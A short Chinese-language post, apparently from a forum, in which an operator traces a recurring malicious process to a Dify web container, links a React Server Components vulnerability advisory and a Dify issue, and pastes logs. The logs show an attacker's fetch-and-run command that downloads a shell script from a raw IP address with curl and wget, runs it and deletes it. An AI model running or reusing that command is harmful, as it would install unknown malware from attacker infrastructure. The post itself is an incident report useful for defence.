杀了过了一会又出现了,
最终定位到是 dify 的 web 容器执行的脚本。
一直没仔细看云平台上的告警:CVE-2025-66478 ( https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components )
dify issue 里显示修复了: https://github.com/langgenius/dify/issues/29202
但是晚上我升级到了 1.10.1-fix.1 ,发现还是有这个问题。。请示领导先关服务了。
脚本名字起得都如此凶戾。
14:29:16 0|dify-web | /bin/sh: curl: not found
14:29:16 0|dify-web | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | rm: can't remove 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | ⨯ [Error: Command failed: curl http://103.135.101.15/wocaosinm.sh;wget http://103.135.101.15/wocaosinm.sh;sh wocaosinm.sh;rm -r wocaosinm.sh
14:29:16 0|dify-web | /bin/sh: curl: not found
14:29:16 0|dify-web | Connecting to 103.135.101.15 (103.135.101.15:80)
14:29:16 0|dify-web | wget: can't connect to remote host (103.135.101.15): Connection refused
14:29:16 0|dify-web | sh: can't open 'wocaosinm.sh': No such file or directory
14:29:16 0|dify-web | rm: can't remove 'wocaosinm.sh': No such file or directory
